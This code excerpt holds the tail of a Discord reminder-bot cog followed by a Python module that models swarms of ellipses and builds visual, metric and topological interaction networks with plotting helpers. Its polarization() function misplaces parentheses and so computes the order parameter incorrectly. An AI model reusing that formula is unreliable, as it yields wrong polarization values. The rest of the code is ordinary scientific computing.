file.write(text) # Write the text
if permission: # If bot has 'Manage Roles' permission
await ctx.author.add_roles(discord.utils.get(guild_roles, name='Auto Remind'), reason='User enabled Auto Remind.') # Add user to Auto Remind role
message = 'Will ping you ' + args + ' minutes before the pound opens!'
embed = discord.Embed(title='Auto Remind', description=message, colour=0x4ba139) # Create embed
await ctx.send(embed=embed) # Send embed
def setup(bot):
bot.add_cog(AutoRemind(bot))
bot.loop.create_task(pound_countdown(bot))
| StarcoderdataPython |
8088028 | <reponame>AnnaMelk/spatial-visual-networks
import numpy as np
import itertools as it
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib.colorbar as colorbar
from matplotlib.patches import Ellipse,Polygon,FancyArrowPatch
import networkx as nx
import os
import shutil
from shapely import geometry
from shapely.geometry.polygon import LinearRing
class Swarm:
'''#####################################################################
This class calculates and stores all data on the swarm of ellipses
pos: position of the eye of each ellipse (2xN array)
pos_center: position of the center of each ellipse (2xN array)
phi: orientation of each ellipse (phi=0 towards pos. x-axis)
w: width of the ellipse, float
l: twice the offset of the eye on the ellipse main axis
from the center, float (l=-1 back, l=1 front, l=0 center)
n: number of ellipses (just for convenience), int
metric_distance_center: array of shape n*n, euclidean distance of ellipses
centers to another
tangent_pt_subj_pol: array of shape [2,n,n] containing the 2 tangent
points (as 2d arrays) for all combinations of
ellipses. Indices [i,j,k]:
i: 1st or second tangent point
j: id of target (tps lie on this ellipse)
k: id of observer (this ellipses contains the eye)
entries are 2d arrays containing r, theta of tangent
point in polar coordinates with the eye of the ob-
server in the origin and theta=0 on pos x-axis
tangent_pt_obj_cart: array of shape [2,n,n] containing the 2 tangent
points (as 2d arrays) for all combinations of
ellipses. Indices [i,j,k]:
i: 1st or second tangent point
j: target (tps lie on this ellipse)
k: observer (this ellipses contains the eye)
entries are 2d arrays containing x,y of tangent
point in the objective cartesian coordinates (same
as used for pos)
visual_angles: array (n*n) used to save the visual angle an individual i would have in the
visual field of individual j (second index) if not obscured
by any others
#####################################################################'''
def __init__(self,N=40,setup='grid',pos=None,pos_center=None,phi=None,w=0.4,l=0.,dist=2.,noise_pos=0.1,noise_phi=0.9,eliminate_overlaps=True):
'''
When an instance of swarm is initialized this sets:
- pos: the position of the eye,
- pos_center: position of the geometric center of each ellipse,
- phi: orientations of the ellipses w.r.t. positive x-axis
- w: width of the ellipses
- l: half of the distance of the eye from the center along the
main axis of the ellipse of length 1
if positions and orientations are given, these are used to create the
swarm and any input in N is ignored.
If no pos and orient are given, they are generated for N ellipses according the input
parameters:
- setup: string, options are 'grid','milling','hexagonal', set basic geometry of spatial configuration
- dist: average distance between two grid-neighbors
- noise_pos: float in [0,0.5], determines the level of positional noise added to the basic geometric setup
noise is sampled from uniform distribution [-noise_pos*dist,noise_pos*dist]
- noise_phi: determines the width of the VonMises distribution that orientational noise is sampled from.
High noise_phi corresponds to low orientational noise
'''
self.w=w
self.l=l
if pos is None and pos_center is None and phi is None:
#initiate positions and orientations according to N, dist, noise_phi, noise_pos and setup
pos,phi=self._generate_initial_spatial_configuration(setup,N,noise_pos,dist,noise_phi,w)
self.pos_center=pos
self.pos=pos-np.array([-l/2.0*np.cos(phi),-l/2.0*np.sin(phi)])
self.phi=phi
self._reset_calculated_variables()
else:
# set positions and orientations according to input
if pos_center is not None and pos is None:
self.set_positions_and_orientations(pos_center,phi,center=True)
elif pos_center is None and pos is not None:
self.set_positions_and_orientations(pos,phi,center=False)
else:
print('Either pos or pos_center needs to be set. If you intend to generate positions, do NOT set either pos or pos_center or phi.')
if eliminate_overlaps and self.n>1:
ok_to_continue=self._eliminate_overlaps()
else:
ok_to_continue=True
if ok_to_continue==False:
print('Overlaps could not be removed successfully. Please try again.')
def polarization(self):
polarization=np.sqrt(np.sum(np.sin(self.phi))**2+np.sum(np.cos(self.phi)**2))/self.n
return polarization
def density(self):
if np.sum(self.metric_distance_center)==0:
self._calc_metric_distances()
third_nearest_neighbor_distance = np.sort(self.metric_distance_center,axis=0)[2]
return 4./(np.pi*np.mean(third_nearest_neighbor_distance)**2)
def _calc_visual_fields(self):
'''Calculates the visual field of all ellipses and returns 1 if successfull, 0 if not
The calculated quantities are saved in the corresponding properties of the class instance,
e.g. self.angular_area
'''
if np.sum(self.metric_distance_center)==0:
self._calc_metric_distances()
self._calc_tangent_pts()
self._calc_vis_field_and_ang_area()
def binary_visual_network(self,threshold=0.,return_networkX=False):
if np.sum(self.angular_area)==0:
self._calc_visual_fields()
adjacency_matrix=np.array(self.angular_area>threshold,dtype=int)
if return_networkX:
return [adjacency_matrix,self._create_network_graph(adjacency_matrix)]
else:
return adjacency_matrix
def binary_metric_network(self,threshold=5.,return_networkX=False):
if np.sum(self.metric_distance_center)==0:
self._calc_metric_distances()
adjacency_matrix=np.array(np.nan_to_num(self.metric_distance_center,nan=np.inf)<threshold,dtype=int)
if return_networkX:
return [adjacency_matrix,self._create_network_graph(adjacency_matrix)]
else:
return adjacency_matrix
def binary_topological_network(self,threshold=5,return_networkX=False):
if np.sum(self.metric_distance_center)==0:
self._calc_metric_distances()
adjacency_matrix=np.array(np.argsort(np.argsort(self.metric_distance_center,axis=0),axis=0)<threshold,dtype=int)
if return_networkX:
return [adjacency_matrix,self._create_network_graph(adjacency_matrix)]
else:
return adjacency_matrix
def set_positions_and_orientations(self,pos,phi,center=False):
'''
sets the positions of ellipse centers (center=True) or eyes (center=False) as well as orientations,
resets any measures previously derived from these quantities
INPUT:
pos: numpy array of dimension 2xN or Nx2
phi: numpy array or list of length N
center: boolean
'''
l=self.l
if np.shape(pos)[0]!=2:
if np.shape(pos)[1]==2:
pos=pos.T
else:
print('positions need to be of shape [2,N] or ([N,2]')
return
if center:
pos_center=pos
self.pos_center=pos_center
if np.shape(phi)==(np.shape(self.pos_center)[1],):
self.pos=self.pos_center-np.array([-l/2.0*np.cos(phi),-l/2.0*np.sin(phi)])
self.phi=phi
else:
print('Length of orientations array must correspond to number of given positions')
else:
self.pos=pos
if np.shape(phi)==(np.shape(pos)[1],):
self.pos_center=self.pos+np.array([-l/2.0*np.cos(phi),-l/2.0*np.sin(phi)])
self.phi=phi
else:
print('Length of orientations array must correspond to number of given positions')
self._reset_calculated_variables()
def _generate_initial_spatial_configuration(self,state,nn,noise_int,d,kappa,w):
if state=='grid':
n=int(np.floor(np.sqrt(nn)))
xlen=n
ylen=n
number=n*n
grid_x=np.linspace(d,d*xlen,xlen,endpoint=True)
grid_y=np.linspace(d,d*ylen,ylen,endpoint=True)
x,y=np.meshgrid(grid_x,grid_y)
pos=np.array([x.flatten(),y.flatten()])
if n<np.sqrt(nn):
for i in range(nn-number):
extra=np.array([d*(xlen+1+np.floor(i/n)),d*(i%n+1)]).reshape(2,1)
pos=np.hstack([pos,extra])
orientations=np.random.vonmises(0.0,kappa,nn)
noise=(np.random.random((2,nn))-np.ones((2,nn))*0.5)*2.0*noise_int*d
pos=pos+noise
return pos,orientations
elif state=='hexagonal':
d_y=d/np.sqrt(2.)
n=int(np.floor(np.sqrt(nn)))
xlen=n
ylen=n
number=n*n
grid_x=np.linspace(d,d*xlen,xlen,endpoint=True)
grid_y=np.linspace(d_y,d_y*ylen,ylen,endpoint=True)
x,y=np.meshgrid(grid_x,grid_y)
x[0:-1:2]+=d/2.
pos=np.array([x.flatten(),y.flatten()])
if n<np.sqrt(nn):
for i in range(nn-number):
extra=np.array([d*(xlen+1+np.floor(i/n)),d_y*(i%n+1)]).reshape(2,1)
pos=np.hstack([pos,extra])
orientations=np.random.vonmises(0.0,kappa,nn)
noise_x=(np.random.random((nn))-np.ones((nn))*0.5)*2.0*noise_int*d
noise_y=(np.random.random((nn))-np.ones((nn))*0.5)*2.0*noise_int*d_y
pos[0]+=noise_x
pos[1]+=noise_y
return pos,orientations
elif state=='milling':
lower, upper = _numberofrings(nn)
radius=(1.0/2.0+np.arange(upper))*d
population=np.floor((radius*2.0*np.pi)/d).astype(int)
totalnumber=np.cumsum(population)
nr_rings=np.amin(np.where(totalnumber>=nn))+1
radius=(1./2.+np.arange(nr_rings))*d
population=np.floor((radius*2.*np.pi)/d).astype(int)
population[-1]=nn-np.sum(population[:-1])
distance=2*np.pi*radius/population
offset=(nr_rings+1)*d
xpos=[]
ypos=[]
orientations=[]
for i in np.arange(nr_rings):
theta=2*np.pi*np.linspace(0,1,population[i],endpoint=False)+((np.random.random(population[i])-np.ones(population[i])*0.5)*2.0*noise_int*d)/radius[i]
orientations.append(theta-np.pi/2.0*np.ones(population[i])+np.random.vonmises(0.0,kappa,population[i]))
xpos.append(radius[i]*np.cos(theta)+offset)
ypos.append(radius[i]*np.sin(theta)+offset)
xpos=np.concatenate(xpos)
ypos=np.concatenate(ypos)
orientations=np.concatenate(orientations)
orientations=_cast_to_pm_pi(orientations)
return np.array([xpos,ypos]),orientations
else:
print("state needs to be either milling or grid or hexagonal")
def _reset_calculated_variables(self):
''' Resets all the variables of swarm that are calculated from the original
input of positions, orientations, ellipse width w and eye position l
'''
self.n=len(self.phi)
self.metric_distance_center=np.zeros([self.n,self.n])
self.tangent_pt_subj_pol=np.zeros([2,self.n,self.n])
self.tangent_pt_obj_cart=np.zeros([2,self.n,self.n])
self.angular_area=np.zeros([self.n,self.n])
self.network=nx.DiGraph()
self.visual_angles=np.zeros([self.n,self.n])
self.eyeinside=()
self.visual_field=np.zeros([self.n,self.n,(self.n-1)*2])
def _eliminate_overlaps(self):
overlaps_exist=self._check_for_overlaps()
if overlaps_exist:
print('moving ellipses to get rid of intersections')
self._reposition_to_eliminate_overlaps()
overlaps_removed_successfully = not self._check_for_overlaps()
return overlaps_removed_successfully
def _calc_metric_distances(self):
'''
calculates the euclidean distance between all
the geometric centers of the ellipses, accessible
via self.metric_distance_center
'''
z_center=np.array([[complex(p[0],p[1]) for p in self.pos_center.T]])
self.metric_distance_center=abs(z_center.T-z_center)
def _check_for_overlaps(self):
overlaps_exist=False
# if any two ellipses are closer than 1 bodylength from each other
if np.sum(self.metric_distance_center<1.):
potential_overlaps=np.array([np.array([a,b]) for a in range(self.n)
for b in range(a) if self.metric_distance_center[a,b]<1.]).T
i=0
while i in range(len(potential_overlaps[0])):
id_1=potential_overlaps[0,i]
id_2=potential_overlaps[1,i]
if self._check_ellipse_pair_for_overlap(id_1,id_2):
overlaps_exist=True
i=np.inf
i+=1
return overlaps_exist
def _check_ellipse_pair_for_overlap(self,id1,id2):
'''determines if ellipse with id1 and ellipse with id2 are intersecting '''
phi1=self.phi[id1]
phi2=self.phi[id2]
pos1=self.pos_center[:,id1]
pos2=self.pos_center[:,id2]
w=self.w
pos1_eye=self.pos[:,id1]
pos2_eye=self.pos[:,id2]
ellipses = [(pos1[0], pos1[1], 1, w/2.0, phi1), (pos2[0], pos2[1], 1, w/2.0, phi2)]
ellipse_a, ellipse_b =_ellipse_polyline(ellipses)
are_intersecting = _intersections(ellipse_a,ellipse_b)
return are_intersecting
def _reposition_to_eliminate_overlaps(self,fileName='random',lamda1=0.05, overdamp=0.5):
'''This function uses C++-code to shift and turn the ellipses
such that they don't intersect anymore, positions and
orientations are exchanged via temporary txt files
- lamda1 - coefficient of the repulsion area of the cells (their main body) (0.01 - 0.05) \n");
- overdamp - coeffiecient that controls cell inertia (0 -1).'''
# save the current position data to file to be read by C-code
if fileName=='random':
fileName=str(int(np.random.random()*1000000))
outpath='./position_orientation_data_tmp/'+fileName
if not os.path.exists(outpath):
os.makedirs(outpath)
pospath=outpath+'_pos.txt'
headingpath=outpath+'_phi.txt'
np.savetxt(pospath,self.pos_center.T,fmt='%1.8f')
np.savetxt(headingpath,self.phi,fmt='%1.8f')
resultpath=outpath
# execute the C-code
command="LD_LIBRARY_PATH=$HOME/lib ./Palachanis2015_particle_system/build/pS 50000 {} {} {} {} {} {} {} {} 1.06 1. 0.".format(180,
self.n,(self.w+0.06)/1.06,lamda1,overdamp,pospath,headingpath,resultpath)
os.system(command)
#load corrected positions and orientations from C-code output
new_pos=np.loadtxt(resultpath+'/pos_d1.000_w%1.2f_bl1.1.txt'%((self.w+0.06)/1.06))
hxhy=np.loadtxt(resultpath+'/headings_d1.000_w%1.2f_bl1.1.txt'%((self.w+0.06)/1.06))
new_phi=np.arctan2(hxhy[:,1],hxhy[:,0])
#set the new positions and orientations
self.set_positions_and_orientations(new_pos,new_phi,center=True)
# remove the tmp files
shutil.rmtree(resultpath)
os.remove(pospath)
os.remove(headingpath)
def _calc_tangent_pts(self,check_intersects=True):
''' calculates the tangent points of ellipses
the result can be found in
- self.tangent_pt_subj_pol (in polar coordinates
centered at a certain individual)
- self.tangent_pt_obj_cart (in cartesian coordinates,
same origin as self.pos)
'''
#initialize lists to collect the calculated tangent points (tp)
tp_subj_pol=[]
tp_obj_cart=[]
# rename some variables for convenience
w=self.w
phi_m=np.array([self.phi,]*self.n).transpose()
x=self.pos[0]
y=self.pos[1]
x_center=self.pos_center[0]
y_center=self.pos_center[1]
# calculate the relative positions of i to j in coordinate
# system with origin in the eye of j
rel_x=x_center.reshape(len(x_center),1)-x #entry(ij)=pos(i)-pos(j)
rel_y=y_center.reshape(len(y_center),1)-y
theta=np.arctan2(rel_y,rel_x)
z=np.array([[complex(p[0],p[1]) for p in self.pos.T]])
z_center=np.array([[complex(p[0],p[1]) for p in self.pos_center.T]])
r=abs(z_center.T-z)
#indices ij: abs(z_center(i)-z(j)), j is observer, i target
#to avoid errors in further calc. result for these will be set manually
np.fill_diagonal(self.metric_distance_center,float('NaN'))
np.fill_diagonal(r,float("NaN"))
# calculate tangent points' parameter psi in parametric ellipse eq.
psi=_get_tangent_point_parameter(w,r,theta,phi_m)
for p in psi:
# calculate tangent point from psi in local polar coordinates
pt_subj_pol=_ellipse_point_from_parameter(r,theta,phi_m,p,w)
z_pt_subj_pol=pt_subj_pol[0]+1j*pt_subj_pol[1]
theta_tp=_cast_to_pm_pi(np.arctan2(pt_subj_pol[1],pt_subj_pol[0])-self.phi)
r_tp=abs(z_pt_subj_pol)
np.fill_diagonal(r_tp,0.0)
tp_subj_pol.append(np.array([r_tp,theta_tp]))
# transform tangent points to cartesian global coordinates
pt_obj_cart=pt_subj_pol+np.array([np.array([self.pos[0],]*self.n),np.array(\
[self.pos[1],]*self.n)])
np.fill_diagonal(pt_obj_cart[0],0.0)
np.fill_diagonal(pt_obj_cart[1],0.0)
tp_obj_cart.append(pt_obj_cart)
self.tangent_pt_subj_pol=np.array(tp_subj_pol)
self.tangent_pt_obj_cart=np.array(tp_obj_cart)
def _calc_vis_field_and_ang_area(self):
'''1. Calculates the visual field for each ellipse and saves it to
self.visual_field, an nxnx2(n-1) array, indices ijk as follows:
i: 0:id of ellipse visible, 1:lower angular boundary of visible section, 2:upper angular boundary of visible section
j: viewer id
k: which section of visual field
(a np.nan entry means no occlusion of visual field in this area)
2. then calculates the angular area of each ellipse in the visual field of all
other ellipses and saves it to self.angular_area, a numpy nxn array
indices ij:
i: seen individual (the one who is seen by individual j)
j: focal individual (the one whose visual field is given)'''
# get ray angles for each ellipse
angles=self.tangent_pt_subj_pol[:,1].flatten(order='f')
angles=np.sort(angles[~np.isnan(angles)].reshape(2*(self.n-1),self.n,order='f').T)
assert np.logical_and(angles.all()<=np.pi, angles.all()>=-np.pi), 'angles are not in pm pi interval'
between_angles=_cast_to_pm_pi(np.diff(angles,append=(2.*np.pi+angles[:,0]).reshape(self.n,1),axis=1)/2.+angles)
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# transformation of angles for the calculation of intersection points
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# transform the local angles into points in global cartesian coordinates
phi=self.phi
phi_hlp=np.repeat(phi.reshape(self.n,1),2*(self.n-1),axis=1)
transf_betw_ang=between_angles+phi_hlp
raypoints=np.array([np.cos(transf_betw_ang),np.sin(transf_betw_ang)])+np.tile(self.pos,((self.n-1)*2,1,1)).transpose(1,2,0)
# here we need to transform the raypoints from global coordinates to local
# ones of the ellipse that we want to check of intersections
# (in a manner that will set up a nested for loop)
raypoints=np.tile(raypoints,(self.n,1,1,1)).transpose(1,0,2,3)
#indices: x/y ,N repetitions (in which coordinate system),focalid (seen from which eye),raypoints (which tangent point)
pos_hlp=np.tile(self.pos_center,(2*(self.n-1),1,1)).transpose(1,2,0)
pos_hlp=np.tile(pos_hlp,(self.n,1,1,1)).transpose(1,2,0,3)
#indices: ijkl x/y,id (coordinate syst.=the individual that intersections will be found for), repetition (which eye), repetitions (which tangent point)
# shifting the raypoints to a coordinate system with origin in the center of the ellipse j (the one that intersections will be found for)
raypoints-=pos_hlp
#now go to polar coordinates and rotate the points by -phi,
# to orient the ellipse j along positive x-axis in the respective
# coordinate system (this is needed because the function calculating
# intersections assumes an ellipse at the center with this orientation)
r=np.sqrt(raypoints[0]**2+raypoints[1]**2)
theta=np.arctan2(raypoints[1],raypoints[0])
phi_hlp=np.tile(phi,(self.n,(self.n-1)*2,1)).transpose(2,0,1)
theta-=phi_hlp
# now the transofmration is over
raypoints=np.array([r*np.cos(theta),r*np.sin(theta)])
# Now we need to similarly transform the eye positions from
# global to local (in a manner that will set up a nested for loop)
# (the id of the viewer ellipse is the second last index, thus
# the array needs to have repetitions for all other axes)
eyes=np.tile(self.pos,(2*(self.n-1),1,1)).transpose(1,2,0)
eyes=np.tile(eyes,(self.n,1,1,1)).transpose(1,0,2,3)
#shift coordinate system origins
eyes-=pos_hlp
#rotate coordinate systems
r=np.sqrt(eyes[0]**2+eyes[1]**2)
theta=np.arctan2(eyes[1],eyes[0])
theta-=phi_hlp
eyes=np.array([r*np.cos(theta),r*np.sin(theta)])
#transformation done
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Calculation of intersection points
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++
inters=_get_ellipse_line_intersection_points(eyes,raypoints,self.w)
inters=_remove_self_intersections(inters,self.n)
# indices: [x/y, which intersection, on which ellipse,
# for which viewer, for which ray]
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++
# all intersection points are still in coordinates of
# the 'on which ellipse' ellipse, transform to global coordinates next:
#1. rotate by +phi
theta=np.arctan2(inters[1],inters[0])+phi_hlp
r=np.sqrt(inters[0]**2+inters[1]**2)
inters=np.array([r*np.cos(theta),r*np.sin(theta)])
# 2. and shift position of origin
pos_hlp=np.tile(pos_hlp,(2,1,1,1,1)).transpose(1,0,2,3,4)
inters=inters+pos_hlp
# in order to decide which intersection point is closest to an
# ellipse we need to move to the coordinate system of the ellipse
# which is emitting the rays from its eye (second last index)
# (we skip the rotation because we are only interested in the
# distances r anyways)
pos_hlp=np.tile(self.pos,(2*(self.n-1),1,1)).transpose(1,2,0)
pos_hlp=np.tile(pos_hlp,(self.n,1,1,1)).transpose(1,2,0,3)
pos_hlp=np.tile(pos_hlp,(2,1,1,1,1)).transpose(1,0,3,2,4)
#shift to the local coordinates
inters-=pos_hlp
#calculate the distances:
r=np.sqrt(inters[0]**2+inters[1]**2)
#Here want to find for each ray emitted from the eye of a viewer ellipse,
# the id of the closest ellipse it intersects with
out=np.empty([self.n,(self.n-1)*2],dtype=float)
closest_id=_get_closest_id(r,out,self.n)
self.visual_field=np.stack([closest_id,angles,np.roll(angles,-1,axis=-1)])
# 1st index: id of ellipse visible/lower boundary/upper boundary
# 2nd index: viewer id
# 3rd index: which section of visual field
area=np.stack([closest_id,(np.diff(self.visual_field[1::,:,:],axis=0)%np.pi)[0]])
# id and area for each section of visual field of each ellipse
# indices ijk:
# i: id/angle
# j: viewer id
# k: section id
# calculate angular area:
angular_area=np.zeros([self.n,self.n],dtype=float)
for i in range(self.n):
mask=area[0]==i
angular_area[i,:]=np.sum(mask*area[1],axis=-1)
self.angular_area=angular_area
def plot_ellipses(self,fig=None,ax=None,color='w',zorder=100,alpha=0.7,show_index=False,edgecolor='0.4', cmap=cm.Greys,show_eyes=True, eyecolor='k',eyesize=5,edgewidth=1,z_label='',norm_z=False,show_colorbar=True):
ellipses=[]
if fig is None:
fig=plt.gcf()
if ax is None:
ax=plt.gca()
if type(color)==str or np.shape(color)==(4,) or np.shape(color)==(3,):
color=[color for i in range(self.n)]
else:
cmax=np.amax(color)
cmin=np.amin(color)
cmap_z=cmap
if not norm_z:
color=cmap((color-cmin)/(cmax-cmin))
norm_z=cm.colors.Normalize(vmin=cmin,vmax=cmax)
else:
color=cmap(norm_z(color))
if show_colorbar:
ax1 = fig.add_axes([0.2, 0.2, 0.6, 0.03])
cb_z =colorbar.ColorbarBase(ax1, cmap=cmap_z,norm=norm_z, orientation='horizontal',label=z_label)
for i in range(self.n):
ellipses.append(Ellipse(self.pos_center[:,i],self.w,1.0,_cast_to_pm_pi(self.phi[i])*180.0/np.pi-90.0))
for i in range(self.n):
ax.add_artist(ellipses[i])
ellipses[i].set_clip_box(ax.bbox)
ellipses[i].set_facecolor(color[i])
ellipses[i].set_alpha(alpha)
ellipses[i].set_edgecolor(edgecolor)
ellipses[i].set_linewidth(edgewidth)
ellipses[i].set_zorder(zorder)
if show_index:
ax.text(self.pos_center[0,i],self.pos_center[1,i],str(i))
if show_eyes:
if eyecolor=='map':
self.draw_eyes(ax,color=color,size=eyesize)
else:
self.draw_eyes(ax,color=eyecolor,size=eyesize)
ax.set_xlim(np.amin(self.pos_center[0])-1,np.amax(self.pos_center[0])+1)
ax.set_ylim(np.amin(self.pos_center[1])-1,np.amax(self.pos_center[1])+1)
ax.set_aspect('equal')
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.tick_params(axis='both', colors='0.5')
ax.spines['bottom'].set_color('0.5')
ax.spines['left'].set_color('0.5')
def draw_eyes(self,ax,color='k',size=20):
ax.scatter(self.pos[0,:],self.pos[1,:],color=color,s=size,zorder=10000)
def plot_visual_field(self,ax=None,viewer_id=1,color='darkseagreen',edgewidth=1,alpha=0.4,edgecolor='none',recolor_vis_individuals=False,vis_thresh=0.,dist_thresh=np.inf):
pos_center=self.pos_center
pos=self.pos
phi=self.phi
segments=self.visual_field
tps=self.tangent_pt_obj_cart
md=self.metric_distance_center
colored=[]
if ax is None:
ax=plt.gca()
for k in range(2*(self.n-1)):
if not np.isnan(segments[0,viewer_id,k]):
i=int(segments[0,viewer_id,k])
if self.angular_area[i,viewer_id]>vis_thresh and md[i,viewer_id]<dist_thresh:
if recolor_vis_individuals and i not in colored:
colored.append(i)
ellipse=Ellipse(pos_center[:,i],self.w,1.0,phi[i]*180.0/np.pi-90.0)
ax.add_artist(ellipse)
ellipse.set_clip_box(ax.bbox)
ellipse.set_facecolor(color)
ellipse.set_alpha(1)
ellipse.set_linewidth(edgewidth),
ellipse.set_edgecolor(edgecolor)
hlp_low=_subjpol_to_objcart(md[i,viewer_id],segments[1,viewer_id,k],pos[:,viewer_id],phi[viewer_id])
hlp_high=_subjpol_to_objcart(md[i,viewer_id],segments[2,viewer_id,k],pos[:,viewer_id],phi[viewer_id])
p1=_line_intersect(hlp_low[0],hlp_low[1],pos[0,viewer_id],pos[1,viewer_id],tps[0,0,i,viewer_id],tps[0,1,i,viewer_id],tps[1,0,i,viewer_id],tps[1,1,i,viewer_id])
p2=_line_intersect(hlp_high[0],hlp_high[1],pos[0,viewer_id],pos[1,viewer_id],tps[0,0,i,viewer_id],tps[0,1,i,viewer_id],tps[1,0,i,viewer_id],tps[1,1,i,viewer_id])
visual_area=Polygon([p1,p2,pos[:,viewer_id]])
ax.add_artist(visual_area)
visual_area.set_facecolor(color)
visual_area.set_alpha(alpha)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.tick_params(axis='both', colors='0.5')
ax.spines['bottom'].set_color('0.5')
ax.spines['left'].set_color('0.5')
def _create_network_graph(self,adjacency_matrix,allinfo=True,plotting_threshold=0.):
network=nx.DiGraph(adjacency_matrix)
if allinfo:
for i in range(len(adjacency_matrix[0])):
network.nodes()[i]['pos']=self.pos[:,i]
network.nodes()[i]['phi']=self.phi[i]
return network
def draw_binary_network(self,network,fig=None,ax=None,rad=0.0,draw_ellipses=True,ellipse_edgecolor='k',ellipse_facecolor='none',link_zorder=10,show_index=False,scale_arrow=10,linkalpha=0.5,lw=0.8,arrowstyle='-|>',linkcolor='0.4'):
'''
INPUT:
network nx.DiGraph(p)
'''
if fig is None:
fig=plt.gcf()
if ax is None:
ax=plt.gca()
l=self.l
w=self.w
for n in network:
if show_index:
ax.text(network.nodes[n]['pos'][0],network.nodes[n]['pos'][1],str(int(n)))
c=Ellipse(network.nodes[n]['pos']+np.array([-l/2.0*np.cos(network.nodes[n]['phi']),-l/2.0*np.sin(network.nodes[n]['phi'])]),w,1.0,network.nodes[n]['phi']*180.0/np.pi-90.0)
ax.add_patch(c)
c.set_facecolor(ellipse_facecolor)
if draw_ellipses:
c.set_edgecolor(ellipse_edgecolor)
else:
c.set_edgecolor('none')
network.nodes[n]['patch']=c
seen={}
for (u,v,d) in network.edges(data=True):
#if d['weight']>=threshold:
n1=network.nodes[u]['patch']
n2=network.nodes[v]['patch']
if (u,v) in seen:
rad=seen.get((u,v))
rad=(rad+np.sign(rad)*0.1)*-1
e = FancyArrowPatch(n1.center,n2.center,patchA=n1,patchB=n2,
arrowstyle=arrowstyle,
mutation_scale=scale_arrow,
connectionstyle='arc3,rad=%s'%rad,
lw=lw,
alpha=linkalpha,
color=linkcolor,zorder=link_zorder)
seen[(u,v)]=rad
ax.add_patch(e)
ax.set_xlim(np.amin(self.pos_center[0])-1,np.amax(self.pos_center[0])+1)
ax.set_ylim(np.amin(self.pos_center[1])-1,np.amax(self.pos_center[1])+1)
ax.set_aspect('equal')
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.tick_params(axis='both', colors='0.5')
ax.spines['bottom'].set_color('0.5')
ax.spines['left'].set_color('0.5')
def _get_ellipse_line_intersection_points(eyes,tps,w):
''' given two points of the line (eyes and tp) calculates
the points at which this line intersects with an ellipse
of length 1 and width w with center at the origin and
orientation along the positive x-axis,
returns points as 2x2 array,
index1: x/y,
index2: which intersection point,
if only 1 intersections found both entries are equal,
if no intersections are found, entries are np.nan'''
x1=eyes[0]
y1=eyes[1]
x2=tps[0]
y2=tps[1]
a=0.5
b=w/2.
dd=((x2-x1)**2/(a**2)+(y2-y1)**2/(b**2))
ee=(2.*x1*(x2-x1)/(a**2)+2.*y1*(y2-y1)/(b**2))
ff=(x1**2/(a**2)+y1**2/(b**2)-1.)
determinant=ee**2-4.*dd*ff
float_epsilon=0.00001
zeromask=abs(determinant)>=1000.*float_epsilon
determinant*=zeromask
t=(np.array([(-ee-np.sqrt(determinant))/(2.*dd),
(-ee+np.sqrt(determinant))/(2.*dd)]))
mask=np.array(t>0.,dtype=float)
mask[mask==0.]=np.nan
x=mask*(x1+(x2-x1)*t)
y=mask*(y1+(y2-y1)*t)
return np.array([x,y])
def _remove_self_intersections(inters,n):
''' used to remove intersections of ray emitted from ellipse i's eye and intersecting with
ellipse i's boundary when detecting all intersections of those rays with all other ellipses,
inters is array of interception points with indices ijklm
i: x/y [2],
j: which intersection [2],
k: on which ellipse [n],
l: for which viewer [n],
m: for which ray [2(n-1)]'''
for i in range(n):
inters[:,:,i,i,:]=np.nan
return inters
def _get_closest_id(r,out,n):
''' used to find the closest intersection point on a ray emitted from and ellipses eye,
r is numpy array with indices jklm as follows:
j: which intersection [2],
k: on which ellipse [n],
l: for which viewer [n],
m: for which ray [2(n-1)]'''
for j,k in it.product(range(n),range((n-1)*2)):
if np.isnan(r[:,:,j,k]).all():
out[j,k]=np.nan
else:
out[j,k]=np.nanargmin(r[:,:,j,k],axis=1)[1]
return out
def _get_tangent_point_parameter(w,r,theta,phi,main_axis=0.5):
'''calculates where the tangent points lie on the ellipse, return the corresponding angles,
these can be translated in to coordinates via using the function
ellipse_point_from_parameter()
'''
w=w/2.0
aa=np.sqrt(-2.0*main_axis*main_axis*w*w + (main_axis*main_axis + w*w)*r*r +
(w*w - main_axis*main_axis)*r*r*np.cos(2.0*(theta - phi)))/np.sqrt(2.0)
bb= w*r*np.cos(theta - phi) - main_axis*w
psi1=2.0*np.arctan2(aa-main_axis*r*np.sin(theta - phi),bb)
psi2= -2.0*np.arctan2(aa+main_axis*r*np.sin(theta - phi),bb)
return [psi1,psi2]
def _numberofrings(nn):
lower_estimate=nn/np.pi
upper_estimate=(np.sqrt(4.*np.pi*nn+1)+1)/2.*np.pi
return int(np.floor(lower_estimate)), int(np.floor(upper_estimate))
def _cast_to_pm_pi(a):
'''Casts any (radian) angle to the
equivalent in the interval (-pi, pi)'''
b = (a+np.pi)%(2.*np.pi)
b -= np.pi
return b
def _ellipse_polyline(ellipses, n=100):
'''returns a polygon approximation of an ellipse with n points'''
t = np.linspace(0, 2*np.pi, n, endpoint=False)
st = np.sin(t)
ct = np.cos(t)
result = []
for x0, y0, a, b, angle in ellipses:
sa = np.sin(angle)
ca = np.cos(angle)
p = np.empty((n, 2))
p[:, 0] = x0 + a/2.0 * ca * ct - b * sa * st
p[:, 1] = y0 + a/2.0 * sa * ct + b * ca * st
result.append(p)
return result
def _intersections(a, b):
ea = LinearRing(a)
eb = LinearRing(b)
mp = ea.intersects(eb)
return mp
def _line_intersect(x1a,y1a,x1b,y1b,x2a,y2a,x2b,y2b):
# finds the point where two lines intersect.
# lines are given by two points each:
# line 1 goes through (x1a,y1a) and (x1b, y1b)
# the same goes for line2
point=None
if (x1b-x1a)!=0:
if (x2b-x2a)!=0:
m1=(y1b-y1a)/(x1b-x1a)
m2=(y2b-y2a)/(x2b-x2a)
if m1!=m2:
b1=y1a-m1*x1a
b2=y2a-m2*x2a
x=(b2-b1)/(m1-m2)
y=m1*x+b1
point=[x,y]
else:
print('lines are parallel')
else:
x=x2b
m1=(y1b-y1a)/(x1b-x1a)
b1=y1a-m1*x1a
y=m1*x+b1
point=[x,y]
